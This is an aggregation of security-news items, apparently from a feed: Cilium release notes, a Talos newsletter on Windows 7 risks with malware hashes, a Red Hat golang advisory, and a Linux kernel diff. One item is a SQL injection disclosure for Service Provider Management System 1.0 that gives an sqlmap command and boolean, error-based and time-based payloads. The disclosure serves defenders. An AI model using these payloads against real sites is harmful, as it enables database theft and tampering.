*   Fix duplicated logs for test-output.log (Backport PR #24547, Upstream PR #24171, @romanspb80)
*   Fixed BPF tests which would fail on older kernels (<=5.8) due to unsupported program loading (Backport PR #24607, Upstream PR #22980, @dylandreimerink)
*   gha: Skip HTTPRouteListenerHostnameMatching test temporarily (Backport PR #24821, Upstream PR #24521, @sayboras)
*   hubble-ui: allow ingress from non root / urls (Backport PR #24607, Upstream PR #23631, @geakstr)
*   loader: Don't compile .asm files by default (Backport PR #24821, Upstream PR #24769, @pchaigno)
*   Operator: Move leader election to a separate Kubernetes client (Backport PR #24547, Upstream PR #24267, @alexkats)
*   pkg/bandwidth: add error for bandwidth manager not being enabled (Backport PR #24758, Upstream PR #24715, @aanm)
*   pkg/cgroups: Prune excessive debug logging (Backport PR #24843, Upstream PR #24815, @aditighag)
*   pkg/service: Extend unit test cases (Backport PR #24821, Upstream PR #24742, @aditighag)
*   proxylib: Downgrade noisy log msg to debug level (Backport PR #24547, Upstream PR #22848, @christarazi)

**Other Changes:**

*   Backport warning about known policy bug to v1.13 (#24892, @squeed)
*   docs: Document IPsec upgrade issue on v1.13.1 (#24705, @pchaigno)
*   helm: fix poststart-eni.bash execution in agent DS (#24789, @nebril)
*   install: Update image digests for v1.13.1 (#24427, @nebril)
*   Prepare for release v1.13.2 (#24900, @gentoo-root)
*   v1.13 egress gateway tests sync (#24859, @jibi)

**Docker Manifests****cilium**

docker.io/cilium/cilium:v1.13.2@sha256:85708b11d45647c35b9288e0de0706d24a5ce8a378166cadc700f756cc1a38d6  
quay.io/cilium/cilium:v1.13.2@sha256:85708b11d45647c35b9288e0de0706d24a5ce8a378166cadc700f756cc1a38d6  
docker.io/cilium/cilium:stable@sha256:85708b11d45647c35b9288e0de0706d24a5ce8a378166cadc700f756cc1a38d6  
quay.io/cilium/cilium:stable@sha256:85708b11d45647c35b9288e0de0706d24a5ce8a378166cadc700f756cc1a38d6

**clustermesh-apiserver**

docker.io/cilium/clustermesh-apiserver:v1.13.2@sha256:4b07ac66d83dcf329252145f82c126705f291687d5b41161321220d115b7fee3  
quay.io/cilium/clustermesh-apiserver:v1.13.2@sha256:4b07ac66d83dcf329252145f82c126705f291687d5b41161321220d115b7fee3  
docker.io/cilium/clustermesh-apiserver:stable@sha256:4b07ac66d83dcf329252145f82c126705f291687d5b41161321220d115b7fee3  
quay.io/cilium/clustermesh-apiserver:stable@sha256:4b07ac66d83dcf329252145f82c126705f291687d5b41161321220d115b7fee3

**docker-plugin**

docker.io/cilium/docker-plugin:v1.13.2@sha256:8ca48bbc394d2c12bdf472cd0108db3632aaa0eda67b9011d2d82e18e0daf810  
quay.io/cilium/docker-plugin:v1.13.2@sha256:8ca48bbc394d2c12bdf472cd0108db3632aaa0eda67b9011d2d82e18e0daf810  
docker.io/cilium/docker-plugin:stable@sha256:8ca48bbc394d2c12bdf472cd0108db3632aaa0eda67b9011d2d82e18e0daf810  
quay.io/cilium/docker-plugin:stable@sha256:8ca48bbc394d2c12bdf472cd0108db3632aaa0eda67b9011d2d82e18e0daf810

**hubble-relay**

docker.io/cilium/hubble-relay:v1.13.2@sha256:51b772cab0724511583c3da3286439791dc67d7c35077fa30eaba3b5d555f8f4  
quay.io/cilium/hubble-relay:v1.13.2@sha256:51b772cab0724511583c3da3286439791dc67d7c35077fa30eaba3b5d555f8f4  
docker.io/cilium/hubble-relay:stable@sha256:51b772cab0724511583c3da3286439791dc67d7c35077fa30eaba3b5d555f8f4  
quay.io/cilium/hubble-relay:stable@sha256:51b772cab0724511583c3da3286439791dc67d7c35077fa30eaba3b5d555f8f4

**operator-alibabacloud**

docker.io/cilium/operator-alibabacloud:v1.13.2@sha256:8b5623a272c18ba823a4105308902cf1901fef494ccad85ab00791296fde4b3b  
quay.io/cilium/operator-alibabacloud:v1.13.2@sha256:8b5623a272c18ba823a4105308902cf1901fef494ccad85ab00791296fde4b3b  
docker.io/cilium/operator-alibabacloud:stable@sha256:8b5623a272c18ba823a4105308902cf1901fef494ccad85ab00791296fde4b3b  
quay.io/cilium/operator-alibabacloud:stable@sha256:8b5623a272c18ba823a4105308902cf1901fef494ccad85ab00791296fde4b3b

**operator-aws**

docker.io/cilium/operator-aws:v1.13.2@sha256:94d5a291f80e2d568302b144d1d002fb1d43b436befed74a38f630fdc6d6f0c6  
quay.io/cilium/operator-aws:v1.13.2@sha256:94d5a291f80e2d568302b144d1d002fb1d43b436befed74a38f630fdc6d6f0c6  
docker.io/cilium/operator-aws:stable@sha256:94d5a291f80e2d568302b144d1d002fb1d43b436befed74a38f630fdc6d6f0c6  
quay.io/cilium/operator-aws:stable@sha256:94d5a291f80e2d568302b144d1d002fb1d43b436befed74a38f630fdc6d6f0c6

**operator-azure**

docker.io/cilium/operator-azure:v1.13.2@sha256:bfce3268bd32f1703ffb22339f9c306e99015585328a39b179c8ace72481a714  
quay.io/cilium/operator-azure:v1.13.2@sha256:bfce3268bd32f1703ffb22339f9c306e99015585328a39b179c8ace72481a714  
docker.io/cilium/operator-azure:stable@sha256:bfce3268bd32f1703ffb22339f9c306e99015585328a39b179c8ace72481a714  
quay.io/cilium/operator-azure:stable@sha256:bfce3268bd32f1703ffb22339f9c306e99015585328a39b179c8ace72481a714

**operator-generic**

docker.io/cilium/operator-generic:v1.13.2@sha256:a1982c0a22297aaac3563e428c330e17668305a41865a842dec53d241c5490ab  
quay.io/cilium/operator-generic:v1.13.2@sha256:a1982c0a22297aaac3563e428c330e17668305a41865a842dec53d241c5490ab  
docker.io/cilium/operator-generic:stable@sha256:a1982c0a22297aaac3563e428c330e17668305a41865a842dec53d241c5490ab  
quay.io/cilium/operator-generic:stable@sha256:a1982c0a22297aaac3563e428c330e17668305a41865a842dec53d241c5490ab

**operator**

docker.io/cilium/operator:v1.13.2@sha256:2c518afd4a1a5123755c1335e3068883283c9572f4355727d789a4846c46c2ae  
quay.io/cilium/operator:v1.13.2@sha256:2c518afd4a1a5123755c1335e3068883283c9572f4355727d789a4846c46c2ae  
docker.io/cilium/operator:stable@sha256:2c518afd4a1a5123755c1335e3068883283c9572f4355727d789a4846c46c2ae  
quay.io/cilium/operator:stable@sha256:2c518afd4a1a5123755c1335e3068883283c9572f4355727d789a4846c46c2ae

CVE-2023-30851: Release 1.13.2 · cilium/cilium

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January.

Thursday, May 25, 2023 14:05

Welcome to this week’s edition of the Threat Source newsletter.

As a longtime macOS user, I must admit I’m behind the times when it comes to Microsoft Windows. Since buying a Steam Deck, I’ve actually come to learn more about Linux and the Proton compatibility layer than I ever did about Windows.

But it still came as a shock to me this week when I uncovered a weird trend on social media: People bragging about still using Windows 7.

Microsoft stopped putting out free security updates for Windows 7 in January 2020 and only more recently stopped offering its paid Extended Security Updates (ESU). The company explicitly told users at the beginning of this year that it was unsafe to continue to keep using Windows 7 and that users should upgrade to Windows 10 or use a new machine that can run Windows 11.

Yet I still found an entire subreddit dedicated to keeping Windows 7 up and running on computers and countless posts promoting how well the 13-year-old operating system runs with modern GPUs and graphics cards.

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January. And Roblox, which is quietly one of the biggest video games in the world, only recently ended support for Windows 7 and 8.

I’m sure there are other examples of this among other types of software, but video games are the most specific corner of the internet I’m in, so that’s my frame of reference.

The moral of the story here is that using Windows 7 to do anything, but especially connecting to the internet (which is required to download and play video games) is a terrible idea. Attackers are always targeting outdated operating systems because they’re the most likely to be unpatched and vulnerable.

Running an operating system that is no longer receiving any type of security updates is extremely dangerous. If infected, that single machine could also be used as a springboard for the attacker to target and infect other machines on your network.

Since the start of this year, there have been 47 vulnerabilities discovered in Windows 7, according to the U.S.’s National Institute of Standards and Technology Vulnerability Database. There are even more security issues with third-party software running on Windows 7.

Just because something is old, doesn’t mean that attackers aren’t paying attention anymore. Without official support or security updates for Windows 7, Microsoft is no longer compelled to disclose formal vulnerabilities with CVEs attached to inform users about any security holes in the operating system.

Upgrading a PC or buying a new one is expensive, I get it. But Windows 7 isn’t a novelty anymore, it’s a security risk. If you feel like you absolutely have to keep Windows 7 running on a machine for some reason, make sure it is isolated from your network or just doesn’t connect to the internet at all.

But more preferably, upgrade to Windows 10. If you’re already using Windows 7, it’s free, and likely whatever hardware you’re using can support Windows 10. If you’re starting from scratch, many online stores have deeply discounted product keys for Windows 10 or 11 for $20 or less — just make sure to download the ISO directly from Microsoft still.

**The one big thing**

Montana recently became the first state in the U.S. to ban the app TikTok, though the law still has a long way to go before it can be enforced. The state’s governor signed a bill last week that prohibits mobile application stores from offering the app in the state by the start of 2024, or else they’ll face fines. However, it’s currently unclear if it’s even feasible for Montana to enforce this ban, as app stores don’t geofence certain applications on its stores, and internet service providers are exempt from having to enforce these rules. TikTok has recently become a target for Republican lawmakers over concerns that its Chinese-backed parent company is collecting and using Americans’ data. TikTok and popular TikTok creators in Montana have already sued the state to stop the law.

**Why do I care?**

Even if you are not an active TikTok user, the ban is noteworthy because it has major implications for American law and the enforcement of the First Amendment in the U.S. Opponents of Montana’s bill say it's a clear violation of the First Amendment. The various legal challenges are likely going to shift through the legal system for months, but any eventual decisions could influence how states view banning certain technology or even books and movies.

**So now what?**

There are many questions still unanswered about how this ban will work or whether it will stand. So for now, interested parties can’t do much but sit back and wait for the legal proceedings to play out.

**Top security headlines of the week**

Apple released a security update for many of its devices last week that **fixed three zero-day vulnerabilities in the WebKit browser engine.** A few days after the patches initially dropped, security researchers also discovered the updates addressed a different vulnerability known as “ColdInvite” (CVE-2023-27930). An attacker could exploit ColdInvite to attack a co-processor chip on iPhones and escape its isolation environment, eventually accessing the iPhone’s kernel. The three WebKit vulnerabilities affect some iPhones and iPads. CVE-2023-28204, CVE-2023-32373 and CVE-2023-32409 could be exploited to escape the Web Content sandbox. Google’s Threat Analysis Group and Amnesty International co-reported CVE-2023-32409, which led many security experts to speculate means attackers exploited this issue to spread spyware. (SecurityWeek, Forbes)

**Two popular Android set-top TV boxes sold on Amazon are preloaded with malware** that quietly generates revenue for the manufacturers in the background. The devices click on ads while running without the user knowing and connect to a global botnet of other infected Android devices around the globe. Despite the reported security issues, the devices were still for sale on Amazon as of earlier this week. However, the security researcher who discovered this botnet worked with the internet company hosting the command and control servers that sent directions to devices part of the botnet to take those servers down. However, that doesn’t mean the botnet or ad-click malware could never come back — the easiest solution for users is to replace the devices immediately. (TechCrunch, ArsTechnica)

Security researchers are concerned that **two new top-level domains from Google — .zip and .mov — will cause confusion among users and potentially open the door for scammers.** Because these new TLDs (like .com, .gov, .uk, etc.) are the same as popular file extensions, adversaries could disguise legitimate-looking file names and actually send people to a malicious web address without the user knowing that it could even be a web page. They could also be used to create legitimate-looking URLs that match that of a real website but just add one character in a long string, eventually pointing people to a malicious file or site. However, Google says it's actively monitoring for domain abuse. (Wired, Ars Technica)

**Can’t get enough Talos?**

*   Highlights of Talos IR On Air: Reviewing Q1's top threats
*   Beers with Talos Ep. #135: The XDR Files
*   Talos Takes Ep. #139: RA Group is just the latest example of the ransomware landscape splintering

*   Beers with Talos Ep. #136: Oh hello, “Susan”

**Upcoming events where you can find Talos**

**Cisco Live U.S. (June 4 - 8)**

Las Vegas, NV

**Discover Cyber Workshop for Women** **(June 8)**

Doha, Qatar

**REcon (June 9 - 11)**

Montreal, Canada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78  
**MD5:** c720ac483a5752c2b69945a8ad673162  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** DeepScan:Generic.BitcoinMiner.9.88FBC400

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

It’s apparently hip to still be using Windows 7

Red Hat Security Advisory 2023-3318-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. The golang packages provide the Go programming language compiler.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset and golang security update  
Advisory ID:       RHSA-2023:3318-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3318  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24540   
=====================================================================

1. Summary:

An update for go-toolset and golang is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

The golang packages provide the Go programming language compiler.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
go-toolset-1.19.9-1.el9_2.src.rpm  
golang-1.19.9-2.el9_2.src.rpm

aarch64:  
go-toolset-1.19.9-1.el9_2.aarch64.rpm  
golang-1.19.9-2.el9_2.aarch64.rpm  
golang-bin-1.19.9-2.el9_2.aarch64.rpm

noarch:  
golang-docs-1.19.9-2.el9_2.noarch.rpm  
golang-misc-1.19.9-2.el9_2.noarch.rpm  
golang-src-1.19.9-2.el9_2.noarch.rpm  
golang-tests-1.19.9-2.el9_2.noarch.rpm

ppc64le:  
go-toolset-1.19.9-1.el9_2.ppc64le.rpm  
golang-1.19.9-2.el9_2.ppc64le.rpm  
golang-bin-1.19.9-2.el9_2.ppc64le.rpm

s390x:  
go-toolset-1.19.9-1.el9_2.s390x.rpm  
golang-1.19.9-2.el9_2.s390x.rpm  
golang-bin-1.19.9-2.el9_2.s390x.rpm

x86_64:  
go-toolset-1.19.9-1.el9_2.x86_64.rpm  
golang-1.19.9-2.el9_2.x86_64.rpm  
golang-bin-1.19.9-2.el9_2.x86_64.rpm  
golang-race-1.19.9-2.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG8Y5dzjgjWX9erEAQhgIA//WztjelwUEEFOAg/b2O92p7LrvnckbT4Q  
nUc4jPJrZpK67BJj7kYIr78aifrDVWU3PEIgeVamQ0yyxno5AvlPL/o8jzGkwjZS  
QgX9VIeeDbFJHykcu0MzoMNvPNLgCSooakR1QrN71MdjgEOTTR7frNLC0sQMIOAD  
OqDy+KHgMKMRFhClIfZLoRlFCqwjrClDrIz/lCsbm16fAX4FJubVzq2lKO+m1kJ0  
CfZDcFE5BKSR2jR7VfW74jGQkk61/cSU8ALktggCGwylPTeu6lzqi61Qnhldq+oF  
sgltURPdF20vvcxEuPakjmJ/9qVl1AnKnVc+RMrWZ8tCkoZk89IVGMJtcNmy1fjW  
ar9B3baGu7qUpaK3Pr7dsWJCk3k4Ws3rCVgXErjWTYooYQY86LHDY60r9A6iugZf  
fjSCa2eFSnQlw4e7cBlgPU5DdRSMOKWwGiIUUBpfFoezdrF1z3o+aRaXpw7tIfTH  
eKsM9uGPPAjoRFxu9HizwqMHFAzGUfVsM5XFphvr5MPFoP/TA11A93ZVi1hsfwem  
Kiu4OPGfp+eOWAzkAuWe8SXBEuXYnttqM1a9VD+JaJQo+4j+k7alqx/sVnWgZg0Q  
OAhpYcfOUGNwPGyZmT1zN7VQ5DSvMoFMON2r47A+FaixTxah500vnUMVSAHtJQO6  
cLOqPg1aA58=  
=eGi1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3318-01

tc is a low-tech free software to chat anonymously and ciphered over Tor circuits in PGP. Use it to protected your communication end-to-end with RSA/DSA encryption and keep yourself anonymously reachable by anyone who only knows your .onion address and your public key. All this and more in 2400 lines of C code that compile and run on BSD and Linux systems with an IRC like GUI.

tc Tor Chat Client

Service Provider Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Service Provider Management System v1.0 - SQL Injection# Date: 2023-05-23# Exploit Author: Ashik Kunjumon# Vendor Homepage: https://www.sourcecodester.com/users/lewa# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html# Version: 1.0# Tested on: Windows/Linux1. Description:Service Provider Management System v1.0 allows SQL Injection via IDparameter in /php-spms/?page=services/view&id=2Exploiting this issue could allow an attacker to compromise theapplication, access or modify data,or exploit the latest vulnerabilities in the underlying database.Endpoint: /php-spms/?page=services/view&id=2Vulnerable parameter: id (GET)2. Proof of Concept:----------------------Step 1 - By visiting the url:http://localhost/php-spms/?page=services/view&id=2 just add single quote toverify the SQL Injection.Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"-p id --dbms=mysqlSQLMap Response:----------------------Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECTCOUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=services/view&id=1' AND (SELECT 1072 FROM(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

Service Provider Management System 1.0 SQL Injection

Copy_from_user on 64-bit versions of the Linux kernel does not implement the __uaccess_begin_nospec allowing a user to bypass the "access_ok" check and pass a kernel pointer to copy_from_user(). This would allow an attacker to leak information. We recommend upgrading beyond commit 74e19ef0ff8061ef55957c3abd71614ef0f42f47

Expand Up @@ -65,117 +65,13 @@ copy\_to\_user\_mcsafe(void \*to, const void \*from, unsigned len) static \_\_always\_inline \_\_must\_check unsigned long raw\_copy\_from\_user(void \*dst, const void \_\_user \*src, unsigned long size) { int ret = 0;  
if (!\_\_builtin\_constant\_p(size)) return copy\_user\_generic(dst, (\_\_force void \*)src, size); switch (size) { case 1: \_\_uaccess\_begin\_nospec(); \_\_get\_user\_asm\_nozero(\*(u8 \*)dst, (u8 \_\_user \*)src, ret, "b", "b", "\=q", 1); \_\_uaccess\_end(); return ret; case 2: \_\_uaccess\_begin\_nospec(); \_\_get\_user\_asm\_nozero(\*(u16 \*)dst, (u16 \_\_user \*)src, ret, "w", "w", "\=r", 2); \_\_uaccess\_end(); return ret; case 4: \_\_uaccess\_begin\_nospec(); \_\_get\_user\_asm\_nozero(\*(u32 \*)dst, (u32 \_\_user \*)src, ret, "l", "k", "\=r", 4); \_\_uaccess\_end(); return ret; case 8: \_\_uaccess\_begin\_nospec(); \_\_get\_user\_asm\_nozero(\*(u64 \*)dst, (u64 \_\_user \*)src, ret, "q", "", "\=r", 8); \_\_uaccess\_end(); return ret; case 10: \_\_uaccess\_begin\_nospec(); \_\_get\_user\_asm\_nozero(\*(u64 \*)dst, (u64 \_\_user \*)src, ret, "q", "", "\=r", 10); if (likely(!ret)) \_\_get\_user\_asm\_nozero(\*(u16 \*)(8 + (char \*)dst), (u16 \_\_user \*)(8 + (char \_\_user \*)src), ret, "w", "w", "\=r", 2); \_\_uaccess\_end(); return ret; case 16: \_\_uaccess\_begin\_nospec(); \_\_get\_user\_asm\_nozero(\*(u64 \*)dst, (u64 \_\_user \*)src, ret, "q", "", "\=r", 16); if (likely(!ret)) \_\_get\_user\_asm\_nozero(\*(u64 \*)(8 + (char \*)dst), (u64 \_\_user \*)(8 + (char \_\_user \*)src), ret, "q", "", "\=r", 8); \_\_uaccess\_end(); return ret; default: return copy\_user\_generic(dst, (\_\_force void \*)src, size); } return copy\_user\_generic(dst, (\_\_force void \*)src, size); }  
static \_\_always\_inline \_\_must\_check unsigned long raw\_copy\_to\_user(void \_\_user \*dst, const void \*src, unsigned long size) { int ret = 0;  
if (!\_\_builtin\_constant\_p(size)) return copy\_user\_generic((\_\_force void \*)dst, src, size); switch (size) { case 1: \_\_uaccess\_begin(); \_\_put\_user\_asm(\*(u8 \*)src, (u8 \_\_user \*)dst, ret, "b", "b", "iq", 1); \_\_uaccess\_end(); return ret; case 2: \_\_uaccess\_begin(); \_\_put\_user\_asm(\*(u16 \*)src, (u16 \_\_user \*)dst, ret, "w", "w", "ir", 2); \_\_uaccess\_end(); return ret; case 4: \_\_uaccess\_begin(); \_\_put\_user\_asm(\*(u32 \*)src, (u32 \_\_user \*)dst, ret, "l", "k", "ir", 4); \_\_uaccess\_end(); return ret; case 8: \_\_uaccess\_begin(); \_\_put\_user\_asm(\*(u64 \*)src, (u64 \_\_user \*)dst, ret, "q", "", "er", 8); \_\_uaccess\_end(); return ret; case 10: \_\_uaccess\_begin(); \_\_put\_user\_asm(\*(u64 \*)src, (u64 \_\_user \*)dst, ret, "q", "", "er", 10); if (likely(!ret)) { asm("":::"memory"); \_\_put\_user\_asm(4\[(u16 \*)src\], 4 + (u16 \_\_user \*)dst, ret, "w", "w", "ir", 2); } \_\_uaccess\_end(); return ret; case 16: \_\_uaccess\_begin(); \_\_put\_user\_asm(\*(u64 \*)src, (u64 \_\_user \*)dst, ret, "q", "", "er", 16); if (likely(!ret)) { asm("":::"memory"); \_\_put\_user\_asm(1\[(u64 \*)src\], 1 + (u64 \_\_user \*)dst, ret, "q", "", "er", 8); } \_\_uaccess\_end(); return ret; default: return copy\_user\_generic((\_\_force void \*)dst, src, size); } return copy\_user\_generic((\_\_force void \*)dst, src, size); }  
static \_\_always\_inline \_\_must\_check Expand Down

Tag

#linux